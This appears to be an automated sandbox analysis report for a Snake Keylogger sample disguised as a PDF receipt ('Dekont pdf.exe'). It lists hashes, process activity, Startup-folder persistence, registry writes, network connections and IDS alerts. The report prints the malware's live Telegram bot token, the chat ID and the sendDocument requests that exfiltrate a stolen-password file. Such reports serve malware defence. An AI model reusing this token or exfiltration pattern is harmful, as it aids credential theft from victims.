| File name: | Dekont pdf.exe |
| Full analysis: | https://app.any.run/tasks/e815dc16-5c1f-4c08-8605-e5e5f3acf666 |
| Verdict: | Malicious activity |
| Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
| Analysis date: | May 23, 2025, 09:17:30 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows, 2 sections |
| MD5: | 2B606C679111AD17B917C94BE1538A06 |
| SHA1: | 31B93F5EA089DA45F42C6BEBDDEBF2497DBD8389 |
| SHA256: | B26734C98A105DBDA718C142D675A8F64C567A28A62CC3B2B51F7686EFEE5BE6 |
| SSDEEP: | 98304:C1Q3bd2HYyYdiCaOCUqCBxDx6FANANcMDrXn0HGLZCBao+bgtx6KNK7+LofsfDZM:9Fs |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:05:22 11:19:10+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 8 |
| CodeSize: | 3389952 |
| InitializedDataSize: | 1536 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x0000 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.301.10425 |
| ProductVersionNumber: | 1.0.301.10425 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| Comments: | - |
| CompanyName: | - |
| FileDescription: | Ngreasj |
| FileVersion: | 1.0.301.10425 |
| InternalName: | Ngreasj.exe |
| LegalCopyright: | Copyright © 2021 |
| LegalTrademarks: | - |
| OriginalFileName: | Ngreasj.exe |
| ProductName: | Ngreasj |
| ProductVersion: | 1.0.301.10425 |
| AssemblyVersion: | 1.0.2206.4826 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7260 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7328 | "C:\Users\admin\AppData\Local\Temp\Dekont pdf.exe" | C:\Users\admin\AppData\Local\Temp\Dekont pdf.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Ngreasj Exit code: 4294967295 Version: 1.0.301.10425 Modules
| |||||||||||||||
| 7384 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Framework installation utility Version: 4.8.9037.0 built by: NET481REL1 Modules
SnakeKeylogger(PID) Process(7384) InstallUtil.exe Keys DES6fc98cd68a1aab8b Options Telegram Bot Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w Telegram Chat ID7660849299 ims-api(PID) Process(7384) InstallUtil.exe Telegram-Tokens (1)8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w Telegram-Info-Links 8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w Get info about bothttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/getMe Get incoming updateshttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/getUpdates Get webhookhttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/getWebhookInfo Delete webhookhttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/deleteWebhook Drop incoming updateshttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/deleteWebhook?drop_pending_updates=true Telegram-Requests Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w End-PointsendDocument Args chat_id (1)7660849299 caption (1)Pc Name: admin | Snake Tracker
PW | admin | Snake Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w End-PointsendDocument Args chat_id (1)7660849299 caption (1)Pc Name: admin | Snake Tracker
PW | admin | Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd99dab33eb38d
Host: api.telegram.org
Content-Length: 715
Connection: Keep-Alive Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w End-PointsendDocument Args chat_id (1)7660849299 caption (1)Pc Name: admin | Snake Tracker
PW | admin | Snake Telegram-Responses oktrue result message_id431 from id8116679558 is_bottrue first_nameAkuj50 usernameAkuj50bot chat id7660849299 first_nameFiy typeprivate date1747991874 document file_nameSnakePW.txt mime_typetext/plain file_idBQACAgQAAxkDAAIBr2gwPULVGg9zsfjNtOy5ZshjdRtnAAJUGgACp-WBUauGDNlpmVycNgQ file_unique_idAgADVBoAAqflgVE file_size503 captionPc Name: admin | Snake Tracker
PW | admin | Snake | |||||||||||||||
| 7500 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7532 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7804 | wscript "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Source.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 7860 | "C:\Users\admin\AppData\Roaming\Source.exe" | C:\Users\admin\AppData\Roaming\Source.exe | — | wscript.exe | |||||||||||
User: admin Integrity Level: MEDIUM Description: Ngreasj Exit code: 4294967295 Version: 1.0.301.10425 Modules
| |||||||||||||||
| 7928 | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Framework installation utility Version: 4.8.9037.0 built by: NET481REL1 Modules
SnakeKeylogger(PID) Process(7928) InstallUtil.exe Keys DES6fc98cd68a1aab8b Options Telegram Bot Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w Telegram Chat ID7660849299 ims-api(PID) Process(7928) InstallUtil.exe Telegram-Tokens (1)8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w Telegram-Info-Links 8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w Get info about bothttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/getMe Get incoming updateshttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/getUpdates Get webhookhttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/getWebhookInfo Delete webhookhttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/deleteWebhook Drop incoming updateshttps://api.telegram.org/bot8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w/deleteWebhook?drop_pending_updates=true Telegram-Requests Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w End-PointsendDocument Args chat_id (1)7660849299 caption (1)Pc Name: admin | Snake Tracker
PW | admin | Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd99dab91cb77b
Host: api.telegram.org
Content-Length: 715
Connection: Keep-Alive Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w End-PointsendDocument Args chat_id (1)7660849299 caption (1)Pc Name: admin | Snake Tracker
PW | admin | Snake Token8116679558:AAFdKwNPiMVbIW9Kg4INxF41oUxDIqgVK2w End-PointsendDocument Args chat_id (1)7660849299 caption (1)Pc Name: admin | Snake Tracker
PW | admin | Snake Telegram-Responses oktrue result message_id432 from id8116679558 is_bottrue first_nameAkuj50 usernameAkuj50bot chat id7660849299 first_nameFiy typeprivate date1747991884 document file_nameSnakePW.txt mime_typetext/plain file_idBQACAgQAAxkDAAIBsGgwPUzHK_4WsshUoZuMHTH5cSRxAAJVGgACp-WBUQZsbYfQlB_ENgQ file_unique_idAgADVRoAAqflgVE file_size503 captionPc Name: admin | Snake Tracker
PW | admin | Snake | |||||||||||||||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (7384) InstallUtil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\InstallUtil_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7328 | Dekont pdf.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Source.vbs | text | |
MD5:00283EB3FAB837E25D97443CEAD5BA47 | SHA256:A681DEA1F93494503D3BAFAAD7CE2D1E2FE5F5C0FDFE607028B6362340B0C984 | |||
| 7328 | Dekont pdf.exe | C:\Users\admin\AppData\Roaming\Source.exe | executable | |
MD5:2B606C679111AD17B917C94BE1538A06 | SHA256:B26734C98A105DBDA718C142D675A8F64C567A28A62CC3B2B51F7686EFEE5BE6 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
7384 | InstallUtil.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5496 | MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
7384 | InstallUtil.exe | 158.101.44.242:80 | checkip.dyndns.org | ORACLE-BMC-31898 | US | whitelisted |
7384 | InstallUtil.exe | 104.21.112.1:443 | reallyfreegeoip.org | CLOUDFLARENET | — | malicious |
6544 | svchost.exe | 40.126.31.3:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2104 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
checkip.dyndns.org |
| whitelisted |
reallyfreegeoip.org |
| malicious |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
api.telegram.org |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Device Retrieving External IP Address Detected | ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org) |
7384 | InstallUtil.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |
7384 | InstallUtil.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |
2196 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org) |
2196 | svchost.exe | Misc activity | ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org) |
7384 | InstallUtil.exe | Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check |
7384 | InstallUtil.exe | Misc activity | ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI |
7384 | InstallUtil.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |
7384 | InstallUtil.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |
7384 | InstallUtil.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |